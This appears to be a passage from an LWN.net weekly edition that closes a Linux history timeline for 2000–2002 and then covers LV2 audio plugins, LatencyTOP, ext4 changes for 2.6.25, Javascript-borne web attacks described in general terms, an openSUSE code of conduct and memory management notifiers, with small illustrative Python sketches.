 August 3, 2000: Copyleft
     is sued by the DVDCCA for putting the DeCSS code on T-shirts.
     Caldera's acquisition of SCO's Unix business (and name) becomes
     official. 

 August 17, 2000: The GNOME
     Foundation is formed.  Debian 2.2 ("potato") is released.

 August 24, 2000: KDE/GNOME
     flame wars break out anew.  Eric Raymond strongly
     criticizes Linus's management practices.  VA Linux claims that
     SourceForge hosts "over 76%" of the world's free software.
     Caldera/SCO announces the "Linux and Unix marriage" - something it
     will wish to annul later on.


Something which was widely understood, but little talked about, during this
time was the great amount of effort VA Linux put into recruiting projects
to SourceForge.  It was a clear effort to become the home for as much
software as possible.  Quite a few prominent projects moved over with great
fanfare, only to drift away more quietly later on.  SourceForge still hosts
a great many projects, but it is seen by many now as a home of last resort.


 August 31, 2000: The Open
     Source Development Lab announces its existence.

 September 7, 2000:
     Trolltech releases Qt under the GPL.  The CueCat saga begins.  The RSA
     patent is released into the public domain - two weeks before it
     expires.


Lest anybody think that the dotcom silliness was truly over by this point,
the CueCat story should convince them otherwise.  Digital Convergence spent
many millions of dollars sending around free barcode scanners on the idea
that people would want to swipe codes from advertisements and be taken to
the associated web site.  This company considered using the scanner for any
other purpose to be a violation of the DMCA, and made loud threats at
people distributing drivers which enabled such uses.  The company's threats
came to nothing, but they foreshadowed the DMCA follies to come.


 September 14, 2000: Linus
     decrees
     that the kernel is licensed under version 2 (only) of the GPL.

 September 21, 2000: Sun
     acquires Cobalt Networks.  Caldera dumps $3 million into EBIZ.
     Linus proclaims the kernel to be in "final freeze," with only critical
     fixes being accepted.

 September 28, 2000: The
     Red Hat Network launches.  Red Hat 7 is released, featuring
     "gcc-2.96," a release which the GCC project never made.


The Red Hat Network was the core of what was to become the subscription
services which support the company so nicely now.  Back then, though, that
outcome still was not clear, and Red Hat continued to experiment with a
number of business ideas.


 October 26, 2000: KDE 2.0
     is released.  LynuxWorks files for an IPO.

 November 2, 2000:
     Turbolinux files for an IPO.  Linuxcare shuts down its European
     operation.  Linus describes the 2.4.0-test10 kernel as having "no known
     bugs." 

 December 7, 2000: The
     2.4.0-test12 prepatches include the new PA-RISC architecture and
     a rework of the task queue API - both of which, apparently, were fixes
     for critical problems.  EBIZ tells its shareholders that things will
     get better soon, honest.

 December 21, 2000: Corel
     sells its Linux business to (what becomes) Xandros.  

 January 11, 2001: The
     2.4.0 kernel is released at last.  Linus warns that it's not yet open
     season for new patches.  The first SELinux prototype is released.


Many people had begun to worry that 2.4.0 would never come.  The story of
the development of this kernel, though, was not done yet.


 January 18, 2001: The
     Ramen worm attacks Red Hat Linux systems.  Turbolinux and Linuxcare
     agree to merge.  Lineo withdraws its IPO application.  VA Linux warns
     that earnings will not be up to expectations.  Helix Code gets
     $15 million in venture investments.  The InterBase backdoor is
     discovered.  Reiserfs gets merged for the 2.4.1 kernel.  The first
     linux.conf.au happens.

 February 8, 2001: SUSE
     (still SuSE then) lays off most of its US staff.

 February 22, 2001: VA
     Linux lays off 25% of its staff, gets a new CEO.  Turbolinux cancels
     its IPO.  Microsoft's Jim Allchin calls Linux "un-American".

 March 15, 2001: Eazel
     releases Nautilus 1.0, lays off half its staff.

 March 22, 2001: The
     Stanford Checker surfaces with a long list of potential kernel bugs.
     EBIZ announces a plan to acquire Linux NetworX.


By this point, things were looking downright scary.  During the bubble
days, almost anybody who wanted to work in free software development could
get a job somewhere.  By this point, though, quite a few people were
without jobs and some of them were leaving the community altogether.

The Stanford Checker was a GCC derivative which could do static analysis;
for many, it was the first real demonstration of what that kind of tool
could do.  Despite some early reassurances, this code was never released;
instead, it was used to found Coverity.  The community has benefited
strongly from Coverity's work, but imagine what we could have done with the
source to the Checker.  It is a little sad that we have been unable to
develop similar capabilities in free software.


 April 5, 2001: Wind River
     Systems buys BSDi.  The first kernel
     summit is held.  Alan Cox states that the 2.4 kernel is not yet
     stable.  Larry Wall begins to post the design of Perl 6.

 April 19, 2001: Wind River
     Systems lays off the Slackware staff.  MandrakeSoft starts asking for
     donations from users.

 April 26, 2001: Ed Felten
     receives DMCA threats over his breaking of the Secure Digital Music
     Initiative watermarking scheme.  Eric Raymond proclaims his intent to
     hack the kernel's social systems.


The threats against Ed Felten - who had participated in a contest put on by
SDMI proponents - were a strong signal that, in the U.S., the DMCA could
bite developers hard.  Worse was to come, though.  Meanwhile, Eric
Raymond's attempts to "hack" a rather unimpressed kernel community provided
a steady stream of comic relief.


 May 3, 2001: Turbolinux
     and Linuxcare cancel their merger.  VA Linux posts horrific quarterly
     earnings.  Sony releases Linux for the PlayStation 2 console.

 May 10, 2001: 
     EBIZ cancels its acquisition of Linux NetworX.  The Bergen Linux Users
     Group implements RFC 1149.

 May 17, 2001: Eazel shuts
     down.  Enhanced Software Technologies - owned by Atipa - shuts down.

 May 24, 2001: MandrakeSoft
     lays off 20% of its employees, including its CEO.


Your editor has said previously that Eazel's plan never seemed (to him) to make
sense; the investors finally came to the same conclusion and pulled the plug.  Another
plan which did not make sense was what had happened to MandrakeSoft:
outside managers placed in the company by its venture capitalists had
decided that Mandrake should be an e-learning company - not exactly its area
of core expertise.  That strategy just about destroyed MandrakeSoft before
the decision to go back to its distributor roots was made.  The company 
has taken many years to recover from that mistake.


 June 21, 2001:
     Red Hat turns a profit.  GCC 3.0 is released.


 June 28, 2001: Caldera
     announces plans to move its distribution to per-seat licensing.  Linus
     announces that the 2.5 development series will open "in a week or
     two."  Meanwhile memory management problems continue to plague the 2.4
     kernel (now at 2.4.5).  VA Linux leaves the hardware
     business.  MandrakeSoft announces plans for an IPO.  LynuxWorks
     withdraws its IPO application. 


In these difficult days, the fact that Red Hat could produce a profit -
even a tiny one - offered a ray of hope.  The failure of VA Linux to make
it in the hardware business was a sobering counterexample, though, given
that VA was once the most prominent company selling Linux-installed systems.


 July 4, 2001: Version 1.0
     of the Linux Standard Base is released.

 July 12, 2001: The Mono
     project is launched.  Atipa shuts down.

 July 19, 2001: MySQL and
     NuSphere end up alleging GPL violations (and more) in court.  Dmitry
     Sklyarov is arrested on DMCA charges in Las Vegas.  EBIZ warns
     stockholders that more money must be found or the company will not be
     viable. 


More than anything else, the arrest of Dmitry was a wakeup call for the
community.  It seemed that, in the U.S., any developer could be arrested
for interfering with the business plans of large companies.  As a result of
this action, some developers still refuse to travel to the U.S.


 August 2, 2001:
     MandrakeSoft completes its IPO, raising €4.2 million.

 August 16, 2001: LWN
     co-founder and editor Liz Coolbaugh leaves
     LWN. 


We still miss Liz - but she remains a good friend.


 August 30, 2001: Dmitry
     Sklyarov is charged with conspiracy and faces 25 years in prison.  VA
     Linux takes the SourceForge software proprietary.

 September 6, 2001: IBM and
     others put millions of dollars into SUSE to keep it from bankruptcy.
     Sistina takes its Global Filesystem (GFS) proprietary.

 September 13, 2001:
     Caldera turns in horrific quarterly earnings; layoffs and a
     reverse stock split follow.  Lineo lays off a large
     portion of its staff.  Great Bridge, a company seeking to
     commercialize PostgreSQL, shuts down entirely.  EBIZ goes into chapter
     11 bankruptcy.

 September 27, 2001: The
     2.4.10 kernel is released.


Few people remember September, 2001, as one of their favorite months.
Beyond the terrible events occurring in the wider world, the problems in
the commercial Linux sector just seemed to get steadily worse.

The 2.4.10 kernel release is an important point as well.  Here is where the
longstanding memory-management problems came to a head; Linus responded
by ripping out the 2.4.9 VM code and replacing it with a completely
different implementation.  What followed may be the closest we ever came to
a fork in the Linux development process.  Some distributors stayed with
2.4.9 for a long time - RHEL 2 systems (still supported by Red Hat)
are still running a kernel which, at least, claims to be 2.4.9.  The worst
passed, however, and this is the point at which 2.4 started toward
something resembling stability.


 October 4, 2001: The World
     Wide Web Consortium proposes allowing patented technology with
     proprietary licensing into web standards.  SUSE brings in another
     round of funding and announces the layoff of 120 people. 

 October 11, 2001: Michael
     Hammel leaves LWN.


Tucows, which had not been helped by having launched a major new offering
on September 11, laid off a number of people, including Michael.  His
desktop columns had been a welcome addition to LWN, and his departure was a
big loss.


 October 18, 2001: Progeny
     stops development of its Debian-based distribution.

 October 25, 2001: Lindows
     announces its existence.  

 November 8, 2001: Linus
     announces that 2.5 will start soon.  Marcelo Tosatti is named as the
     2.4 maintainer.  IBM open-sources Eclipse.  The European software
     patent directive picks up steam.

 November 29, 2001: The 2.5
     kernel development series starts - with a filesystem corruption bug.

 December 6, 2001: The
     Mandrake Club is launched as a fund-raising initiative.


Initially the Mandrake Club was meant to function as a sort of tip jar.  As
financial problems at MandrakeSoft got worse, though, it became the
storefront through which the Mandrake distribution was sold.  Not everybody
liked how the Club was run, but it doubtless helped MandrakeSoft to survive
into the present.


 December 20, 2001: Charges
     against Dmitry Sklyarov are "deferred" and he returns home to Russia.

 January 17, 2002: DeCSS
     creator Jon Johansen is indicted in Norway.  

 January 31, 2002: LWN is
     unacquired.  2.5 kernel patches get dropped, leading to another "Linus
     does not scale" discussion.


The indictment of Mr. Johansen made it clear that DMCA-like problems were
not limited to the USA.

Meanwhile, by this time, Tucows had come to terms with the fact that its
acquisition (and ongoing operation) of LWN was not helping it, given the
directions its business was taking.  So, after some discussion, LWN was
unacquired - it was given back to its creators, with Tucows holding on to a
small piece just in case.  The parting was on the best of terms; it
revalidated our decision to go with Tucows in the first place.  But, after
almost two years, it was time for LWN to venture back out into a scary
world as an independent business.
That was the beginning of a new phase, with its
own ups and downs, which will be discussed in the next installment.

		The LV2 Audio Plugin Standard


LADSPA, Richard Furse's
Linux Audio Developer's Simple Plugin API, provides a plug-in
framework for software audio effects.  LADSPA applications are
divided into two categories, host applications and plugins.
From the LADSPA site:


LADSPA is a standard that allows software audio processors and effects to be plugged into a wide range of audio synthesis and recording packages.
For instance, it allows a developer to write a reverb program and bundle it into a LADSPA "plugin library." Ordinary users can then use this reverb within any LADSPA-friendly audio application. Most major audio applications on Linux support LADSPA.


Recently, the LV2 Audio Plugin Standard was announced by Dave Robillard; the
aim of LV2 is to replace LADSPA:


LV2 is a standard for plugins and matching host applications, mainly targeted at audio processing and generation.
LV2 is a simple but extensible successor of LADSPA, intended to address the limitations of LADSPA which many applications have outgrown.
While LADSPA has been quite successful with many plugins and hosts, it is quite limited and can't be extended without breaking existing implementations. LV2 in contrast is designed with extensibility in mind right from start.


One of the LADSPA limitations comes from the use of fixed data fields
in the plugin binaries.  LV2 defines its plugin data by using the
Resource Description Framework (RDF) standard.
This allows for a much wider variety of plugin data definitions.
The RDF files also allow for the inclusion of multiple string
definitions, which allows for plugin internationalization.
The core LV2 code is intentionally designed to be small and generic,
while allowing for support of independently designed extensions.


Plugin identification has been changed from an ID number to a URI;
this allows for extended capabilities such as referencing or fetching
plugins across the network.
While LADSPA only used floating point numbers for port connections, LV2
supports port type extensions.  This can be used to handle
MIDI, OSC (OpenSound Control), frequency domain and other types of data.
LV2 bundles all of the data for each plugin into a single directory
for easy access. As with ALSA, the actual LV2 core specification
is relatively simple; the lv2core-1.tar.gz
source file consists of a C header file, some build files and
documentation.
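
The ideas in the last few paragraphs (URI-based identification, translated
strings and typed ports) can be pictured with a small Python model.  This is
only a sketch: LV2 itself describes plugins in RDF files and exposes a C
header, and every name below (the PluginInfo and Port classes, the
example.org URI, the port type strings) is hypothetical.

```python
from dataclasses import dataclass, field


@dataclass
class Port:
    symbol: str
    port_type: str  # free-form string, so new port types can be added later


@dataclass
class PluginInfo:
    uri: str                                   # identifies the plugin
    names: dict = field(default_factory=dict)  # language tag -> display name
    ports: list = field(default_factory=list)

    def name(self, lang="en"):
        """Return the name for lang, falling back to English, then the URI."""
        return self.names.get(lang, self.names.get("en", self.uri))


registry = {}


def register(plugin):
    """Index plugins by URI rather than by a numeric ID."""
    registry[plugin.uri] = plugin


register(PluginInfo(
    uri="http://example.org/plugins/reverb",
    names={"en": "Simple Reverb", "de": "Einfacher Hall"},
    ports=[Port("in", "audio"), Port("out", "audio"), Port("notes", "midi")],
))

reverb = registry["http://example.org/plugins/reverb"]
print(reverb.name("de"), [port.port_type for port in reverb.ports])
```

Keeping the port type as open-ended data, rather than a fixed field, is what
lets a host in this model encounter a type it has never seen without the
plugin description format itself having to change.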


Several software packages were released at the same time as the
LV2 standard announcement.
SLV2 0.4.2 is a C library
that is used to access the LV2 plugins:
"Unlike LADSPA, LV2 is (more or less) designed with the assumption that
hosts will use a library to discover/load/use plugins.  SLV2 is one such
library, which does the Right Thing with as little burden on host
authors as possible."
The 
lv2dynparam extension and helper was also announced:
"The extension consists of a header describing the extension interface
and libraries, one for plugins and one for hosts, to expose
functionality in more usable, from programmer point of view, interface."


Three LV2-compatible plugins were also announced by author Nedko Arnaudov:
lv2vocoder version 1, Simple Sine Generator 20080109 and
zynadd plugin version 1.
Arnaudov also released
zynjacku version 1,
a JACK-based GTK2 host for LV2 synthesizers.
The success of LV2 will revolve around its adoption by one or more of the
major LADSPA applications, as well as the conversion of more LADSPA
plugins.  Conceptually, LV2 seems like a step forward for the Linux audio
plugin architecture.


		Finding system latency with LatencyTOP


Stuttering audio or an unresponsive desktop – typically caused by
operating system latency – are two things that annoy
users.  They can be difficult problems to diagnose, though, as they are
transient 
and buried deep inside the kernel.  A new tool, LatencyTOP, seeks to provide more
information on where latency is occurring so that it can be fixed or avoided.


Latency is the measure of how much time elapses between when an action is
initiated and when its effects become visible.  If a user clicks the mouse
button in an application, the latency is the amount of time between that
click and when the associated action begins.  There are lots of different
reasons for 
latency, some of which are outside of Linux's control; being able
to measure what latency the OS is contributing will be very useful.
LatencyTOP is reporting on a specific subset of latency causes, as described
in the announcement:


There are many types and causes of latency, and LatencyTOP [focuses on the]
type 
that causes audio skipping and desktop stutters. Specifically, LatencyTOP 
focuses on the cases where the applications want to run and execute useful 
code, but there's some resource that's not currently available (and the 
kernel then blocks the process). This is done both on a system level and 
on a per process level, so that you can see what's happening to the system, 
and which process is suffering and/or causing the delays.


LatencyTOP measures the average and maximum amount of latency in various
operations by inserting annotation calls in the kernel.  An example from
the announcement is instructive:

The scheduler accumulates any time spent sleeping, between the
set_latency_reason() and restore_latency_reason() calls,
charging it to the "sync system call".  Any lower level calls to set the
latency reason will be ignored in this code path – they may be useful
in other code paths – as it is the highest level active reason that
gets charged.
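
The "highest level active reason wins" rule can be modeled in a few lines of userspace code.  What follows is only a toy sketch, not the kernel implementation: the LatencyAccounting class and the "writing a page" reason are invented for illustration, and a context manager stands in for the set_latency_reason() and restore_latency_reason() pair.

```python
import contextlib


class LatencyAccounting:
    """Toy model: sleep time is charged to the outermost active reason."""

    def __init__(self):
        self.active_reason = None   # reason currently in force, if any
        self.charged = {}           # reason -> accumulated sleep time (ms)

    @contextlib.contextmanager
    def latency_reason(self, reason):
        # Stands in for set_latency_reason()/restore_latency_reason().
        # A nested (lower-level) reason is ignored while a higher-level
        # one is already active.
        previous = self.active_reason
        if previous is None:
            self.active_reason = reason
        try:
            yield
        finally:
            self.active_reason = previous

    def sleep(self, ms):
        # Stand-in for the scheduler noticing that the task slept.
        reason = self.active_reason or "Unknown reason"
        self.charged[reason] = self.charged.get(reason, 0) + ms


acct = LatencyAccounting()
with acct.latency_reason("sync system call"):
    acct.sleep(5)
    with acct.latency_reason("writing a page"):   # hypothetical inner reason
        acct.sleep(20)
acct.sleep(3)                                     # no annotation active
print(acct.charged)
```

All 25ms spent inside the outer annotation land on "sync system call"; the unannotated sleep falls into the "Unknown reason" bucket.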


The current interface for annotating is likely to change, though the
semantics will stay the same.  Comments on the
original submission suggested using the kernel markers feature that was
merged for 2.6.24.  LatencyTOP developer Arjan van de Ven seems amenable to
that; reusing a kernel interface, rather than adding a new one, is
generally the right choice.  There is other work to do as well; the patch
was submitted for other kernel hackers to test and comment on, not to be
merged into the mainline.


LatencyTOP comes with a userspace application, shown at right, that
displays the information gathered.  It reads from the
/proc/latency_stats file that is created by the LatencyTOP infrastructure patch
– so long as you enable CONFIG_LATENCYTOP in the kernel.  The upper pane
displays the nine largest latencies over the past 30 seconds; it would seem
that ten were intended, but for an off-by-one error in the code.


A list of process names, which can be selected with the arrow keys, runs
along the bottom of the display. The latency sources for
that process will then be shown in the lower pane.  The example at left
shows the tool with the
firefox process selected.  As can be seen, there are still lots of areas
that need annotations – "Unknown reason" along with the wait channel are
displayed when the reason has not been set.  When narrowing a problem down,
it should be straightforward for a kernel hacker to add annotations to the
appropriate locations.

 LatencyTOP, like its sibling PowerTOP –
also developed by van de Ven at the Intel Open Source Technology Center
– is a powerful tool for trying to track down system problems.  It
will probably undergo some changes along the way: the userspace
application is still rather rudimentary and the kernel data collection
needs finer-grained locking.  But, before too long, a mainstream tool
to measure system latency based on this work should appear.  

		A better ext4


Last week's Kernel Page may
have been filesystem-heavy, but there was still a big omission, in the form
of ext4.  But ext4, being the successor to ext3, may well be the filesystem
many of us are using a few years from now.  Things have been relatively
quiet on that front - at least, outside of the relevant mailing lists - but
the ext4 developers have not been idle.  Some of their work has now come to
the surface with Ted Ts'o's posting of the ext4 merge plans for 2.6.25.


One of the changes going into ext4 is a lifting of the longstanding 4KB
block size limit.  That does not mean that just any block size works, though,
and this feature will benefit fewer people than one might think, for one
specific reason: the block size must still be no larger than the page size
on the host system.  So those of us running x86 systems with 4KB pages will
be stuck with 4KB blocks still.  And, on any system, the maximum block size
is now 64KB.
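
The rule is simple enough to write down as a check.  This is a sketch rather than anything taken from the patches: the function name is made up, and the 1KB lower bound and power-of-two requirement are assumptions carried over from ext3, not something stated above.

```python
MAX_BLOCK_SIZE = 64 * 1024   # the new upper limit described above
MIN_BLOCK_SIZE = 1024        # assumption: the ext3 minimum still applies


def block_size_is_usable(block_size, page_size):
    """Hypothetical helper: may a filesystem with this block size be used?"""
    power_of_two = block_size > 0 and (block_size & (block_size - 1)) == 0
    return (power_of_two
            and MIN_BLOCK_SIZE <= block_size <= MAX_BLOCK_SIZE
            and block_size <= page_size)


print(block_size_is_usable(8192, 4096))     # x86 with 4KB pages
print(block_size_is_usable(65536, 65536))   # a system with 64KB pages
```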


One amusing effect of this change is that the size of a directory entry can
now be as large as 64KB as well.  But the field which holds the size of
directory entries is only 16 bits wide.  So a special hack has been
employed to recognize 64KB directory entries and keep everything
consistent.
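
The nature of the problem is easy to see: a 16-bit field tops out at 65535, one short of 64KB.  One plausible encoding, shown here as an assumption and not as a description of the actual patch, is to reserve a stored value that can never be a legitimate length (directory entry lengths are multiples of four) to mean "the whole 64KB block."

```python
MAX_STORED = 0xFFFF      # largest value a 16-bit field can hold
FULL_BLOCK = 1 << 16     # a directory entry spanning a 64KB block


def rec_len_to_disk(length):
    """Encode an entry length into 16 bits (sentinel choice is an assumption)."""
    if length == FULL_BLOCK:
        return MAX_STORED
    if length % 4 != 0 or not 0 < length < FULL_BLOCK:
        raise ValueError("invalid directory entry length: %d" % length)
    return length


def rec_len_from_disk(stored):
    """Decode the 16-bit on-disk value back into a real length."""
    return FULL_BLOCK if stored == MAX_STORED else stored


for length in (12, 4096, 65536):
    print(length, "->", rec_len_to_disk(length))
```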


Some internal variables have overflow problems as well.  Block numbers are
stored as a signed, 32-bit quantity, and so are block group numbers.  That
limits the maximum size of a filesystem to a mere 256PB.  In 2.6.25, these values will
become unsigned long variables, eliminating that intolerably low limit.
Through some trickery, the inode field which stores the number of blocks
associated with a file will be expanded to 48 bits, raising the
maximum size of an individual file to just under 2^48 512-byte
blocks.  
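
For those who like to check the arithmetic, here is one way to arrive at these figures.  The 4KB block size and the 32768-blocks-per-group layout are assumptions (they are the usual defaults, but they are not stated above); with them, the 256PB limit falls out of the signed, 32-bit block group number.

```python
PIB = 2**50   # one pebibyte, in bytes

# Assumption: 4KB blocks, with each block group covering as many blocks
# as one bitmap block has bits (8 * 4096 = 32768 blocks, or 128MB).
block_size = 4096
blocks_per_group = 8 * block_size
group_bytes = blocks_per_group * block_size

# A signed 32-bit group number allows 2^31 block groups.
max_fs_bytes = 2**31 * group_bytes

# A 48-bit count of 512-byte blocks bounds the size of a single file.
max_file_bytes = 2**48 * 512

print(max_fs_bytes // PIB, "PiB filesystem limit")
print(max_file_bytes // PIB, "PiB per-file limit")
```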


The work does not stop there, though: another patch redefines that field
to mean the number of filesystem blocks (instead of 512-byte sectors) used
by the file.  This is a change which has to be handled carefully, since it
is an on-disk format change which could create trouble for people with
existing ext4 filesystems.  Everybody who is using ext4 should certainly be
doing so with the knowledge that it's a development filesystem and is only
suitable for storing files which are not valuable for more than about
30 minutes - Rawhide OpenOffice.org updates, say.  But it still would be
nice to not trash every existing ext4 filesystem out there.  So the
i_blocks field will continue, by default, to hold the number of
512-byte blocks.  But, if that field exceeds 32 bits and forces the use of
48-bit numbers, it is thereafter interpreted as filesystem blocks.  Since
no existing filesystems are yet using 48-bit numbers, this approach
successfully avoids breaking them.
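
The dual interpretation can be sketched as follows.  This is a model of the behavior described above, not the patch itself; in particular, the boolean saying which unit is in use is a hypothetical stand-in for however the filesystem actually records that fact.

```python
SECTOR = 512


def encode_i_blocks(sectors_used, fs_block_size):
    """Return (stored_value, in_fs_blocks) for a file's block count."""
    if sectors_used < 2**32:
        # Fits in 32 bits: keep the traditional 512-byte units.
        return sectors_used, False
    # Too big for 32 bits: count filesystem blocks from here on.
    return sectors_used * SECTOR // fs_block_size, True


def decode_i_blocks(stored_value, in_fs_blocks, fs_block_size):
    """Return the number of bytes the stored count represents."""
    unit = fs_block_size if in_fs_blocks else SECTOR
    return stored_value * unit


small = encode_i_blocks(8, 4096)
huge = encode_i_blocks(2**33, 4096)
print(small, decode_i_blocks(*small, 4096))
print(huge, decode_i_blocks(*huge, 4096))
```

Existing filesystems only ever take the first branch, which is why they are unaffected.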


Journal checksums are another feature arriving for 2.6.25.  If the system
crashes, the journal is used to recover any transactions which were
committed, but which did not actually make it to disk.  It sure would
be nice to know that the journal, as stored in the filesystem, is intact
before using it to make changes elsewhere.
The checksum enables the filesystem to ensure that the journal is good and
avoid (further) corrupting the filesystem if it is not.  An interesting
side benefit is that the checksum loosens the constraints on how the
journal is written to disk, since an incompletely-written journal will now
be detected; that should help to improve filesystem performance slightly.
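
The idea can be illustrated with a toy journal.  This is a sketch under stated assumptions: the article does not say which checksum is used, so CRC32 (via Python's zlib) is a stand-in, and the commit() and replay() functions and the dictionary layout are invented for the example.

```python
import zlib


def checksum(blocks):
    """CRC32 over all blocks of a transaction, in order."""
    crc = 0
    for block in blocks:
        crc = zlib.crc32(block, crc)
    return crc


def commit(blocks):
    """Build a journal transaction: the blocks plus their checksum."""
    return {"blocks": list(blocks), "checksum": checksum(blocks)}


def replay(transaction, disk):
    """Apply a transaction to `disk` only if the journal copy is intact."""
    if checksum(transaction["blocks"]) != transaction["checksum"]:
        return False        # damaged journal: leave the filesystem alone
    disk.extend(transaction["blocks"])
    return True


txn = commit([b"inode table update", b"block bitmap update"])
disk = []
print(replay(txn, disk))                      # intact journal is replayed

txn["blocks"][1] = b"block bitmap updatf"     # simulate on-disk corruption
print(replay(txn, []))                        # damaged journal is refused
```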


Note that full data checksumming is still not on the agenda for ext4.  But
checksumming the journal is a good (if small) step in the right direction.


Another patch changes the VFS API: it turns the i_version
field of the inode structure into an unsigned, 64-bit value on all
architectures.  This version number is incremented when the file is
changed, and it's stored (split into two fields) in the on-disk inode.
64-bit version numbers are required by NFSv4, which uses them to provide
the dreaded "stale file handle" error when things change.
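
Splitting a 64-bit counter across two fields is straightforward.  The sketch below assumes two 32-bit halves, which is a guess at the layout and not something the patch description above confirms; the function names are likewise made up.

```python
MASK32 = 0xFFFFFFFF


def split_version(version):
    """Split a 64-bit counter into (low, high) 32-bit halves for storage."""
    return version & MASK32, (version >> 32) & MASK32


def join_version(low, high):
    """Rebuild the 64-bit counter from its two stored halves."""
    return (high << 32) | low


version = join_version(MASK32, 0) + 1   # increment across the 32-bit boundary
print(split_version(version))
```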


There is a new ioctl() (EXT4_IOC_MIGRATE) which can be
used to explicitly request that the on-disk inode for a file be converted
to the ext4 format.


The ext4 filesystem is extent-based, and has been for some time.
"Extent-based" means that it tracks block allocations by extents (first
block, number of blocks) rather than storing pointers to each individual
block, as is done in ext3.  There are a number of performance benefits to
doing things this way, especially for larger files.  Those benefits
disappear, though, if a file's blocks cannot be grouped into the smallest
number of extents possible.  
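
A small illustration shows why contiguity matters.  The function below is not ext4 code; it just collapses a file's block list, taken in file order, into (first block, number of blocks) pairs.

```python
def blocks_to_extents(blocks):
    """Collapse block numbers (in file order) into (first, count) extents."""
    extents = []
    for block in blocks:
        if extents and extents[-1][0] + extents[-1][1] == block:
            first, count = extents[-1]
            extents[-1] = (first, count + 1)    # extend the current extent
        else:
            extents.append((block, 1))          # start a new extent
    return extents


contiguous = blocks_to_extents(range(1000, 1100))
fragmented = blocks_to_extents(range(1000, 1200, 2))
print(len(contiguous), "extent for 100 contiguous blocks")
print(len(fragmented), "extents for 100 scattered blocks")
```

A hundred contiguous blocks need a single extent; the same number of scattered blocks needs a hundred of them, at which point the extent map is no better than a list of block pointers.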


One technique which greatly helps in optimizing block allocations for files
is to allocate them in relatively large groups, rather than individually.
In 2.6.25, ext4 will contain the multi-block allocator, which does exactly
that.  One might think that allocating a few blocks at a time would not be
that big of a change, but the multi-block allocator is by far the most
complex patch in the set.  A lot of effort and heuristics go into deciding
how many blocks to allocate, finding the optimal set of blocks, tracking
the allocation, recovering blocks which end up never being used, ensuring
that an application cannot read pre-allocated (but unwritten) blocks in
search of leaked secrets, etc.  It is quite a bit of code, but it is worth
the trouble; multi-block allocation will be enabled by default in 2.6.25.


As noted above, a number of these patches force changes to the on-disk data
structure.  According to Ted, though, these should be the last on-disk
changes for ext4.  There are some features which still will not have been
merged when 2.6.25 comes around - delayed allocation and online
defragmentation among them - but they should not require format changes.
So ext4 is getting closer to the point where it is considered ready for
production use.


It is not at that point yet, though, and people who use it are still
doing so at their own risk.  To help drive that point home, Ted has
proposed a new mount flag
(called test_fs) which communicates to the kernel the user's
understanding that they are about to mount a developmental filesystem and
will not go filing lawsuits if things go wrong.  In the absence of this
mount option, an ext4 filesystem will refuse to mount.  One might think
that child-proofing the filesystem in this way would not be necessary, but
some extra care in this area can only be a good thing.  Filesystem-related
surprises are rarely welcome.

		Web security vulnerabilities and Javascript


Various recent, unrelated security issues seem to have a common thread:
Javascript.  It is not the fault of the language, exactly, nor of any
particular implementation.  It is the fundamental nature of how the
language is used that often causes it to be "front and center" when security
problems are found on the web.


Imagine that your computer reaches out across the net, to an unverified
site, over an unencrypted link and grabs code that it executes with little
in the way of further inspection.  When put that way, it sounds rather
dangerous, but that is exactly what browsers do with Javascript code.
There are limits to what Javascript is allowed to do—meant to thwart
malicious uses—but it has to have some privileges on the local
machine in order to be useful.

 One of the recent outbreaks is the "random js" attack, which propagates
through Javascript served by legitimate websites.  It generates a random
.js filename for each visitor—which is where the name comes
from—inserting a reference to it in a page on the site.  It also
stores the IP address of the visitor so that it does not repeat the
infection multiple times.  The payload then tries to exploit a dozen or more
Windows vulnerabilities to install malware of various sorts.

The payload is not a problem for Linux users, but the websites hosting the
attack are running Apache, many on Linux.  The big unresolved question is
how the servers were infected.  It could be as simple as getting root
access via insecure or intercepted root passwords.  Or there could be some,
as yet unknown, exploit.  That certainly bears watching.


Because of the privileges that Javascript has on a local host, it can be
used to spread malware, by exploiting the trust that
users—those that even concern themselves with such things—have
in the website they are visiting.  It can also play a role in redirecting
traffic away from a trusted site, even though the site itself has not been
compromised.  

 A post
by Nat Torkington at O'Reilly illustrates a common problem that content
providers need to worry about.  O'Reilly's perl.com site carried
advertising that required them to load Javascript from the advertiser's
site.  All was well until the domain expired. A porn site bought it and
started providing the required Javascript file with new contents
redirecting the users to their site.  

A man-in-the-middle or DNS cache poisoning attack could be used for similar
results on a smaller scale.  One can certainly see how it might be
used by phishers as well.  It is a difficult problem, as website owners need
to be able to call out to advertisers' Javascript, but users typically do
not expect to run code from a site they did not directly access.


A previously theoretical attack on home routers has started to show up in the
wild.  It uses Javascript to exploit a vulnerability in home routers to
change the DNS entries for a popular Mexican bank.  After that, accesses to
the bank would instead go to the malicious website which would collect
usernames and passwords, allowing the attacker to access the accounts.
Once again, users probably do not expect that surfing to a random site
could suddenly expose them to bank account compromise.

 There are some things that can be done.  For users, if Javascript
cannot be disabled entirely—something increasingly difficult in the
"Web 2.0" world—it can at least be leashed using NoScript for Firefox.  

For website owners, Google's Caja project seeks to
define a subset of Javascript which implements an object-capability
language, which would make it easier to sandbox remote code.  If this
effort succeeds, one can imagine that users could restrict their browsers
to only use the Caja subset some day as well.


		A Code of Conduct


The openSUSE project board has proposed a code of
conduct for mailing lists and IRC.  This would be in addition to the
existing Guiding
Principles, mailing list
netiquette guide and IRC
rules.

There seems to be a trend among open source projects to adopt a code of
conduct.  As the number of people participating on mailing lists and IRC
channels increases, so does the level of poorly stated questions, off-topic
chatter and other annoyances.  As levels of frustration increase, so does
the potential for rudeness.  Whether a poster intends to be rude or is
only perceived to be rude makes little difference.  The international
nature of this communication almost ensures there will be some
misunderstandings based on culture and language.

So do codes of conduct really work?  They can, but often they do not.  If
the code is not enforced then there is no incentive for anyone to read the
code, much less follow it.  If the code is too actively enforced it will
stifle communication.  Somewhere in between there must be a happy medium.
Finding it can be a challenge for even the most diplomatic of enforcers.

There are no quick fixes for the problems that come with active channels of
communication.  There are many documents throughout the web that urge
people to be polite and helpful and that explain how to ask better questions
and how to provide better answers.  LWN readers may be more aware of them than the
average netizen.  It is up to the aware to educate the unaware in as kind
and gentle a manner as possible.

		Memory management notifiers


Virtualized guests running under Linux like to think that they are doing
their own memory management.  The truth of the matter, though, is that the
host system cannot allow guests to directly modify the page tables used by
the hardware; allowing that sort of access would compromise the security of
the host.  So, somehow, the host must be involved in the guest's memory
management.  One common technique is through the use of shadow page
tables.  Guest systems maintain their own page tables, but they are not the
tables used by the memory management unit.  Instead, whenever the guest
makes a change to its tables, the host system intercepts the operation,
checks it for validity, then mirrors the change in the real page tables,
which "shadow" those maintained by the guest.
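
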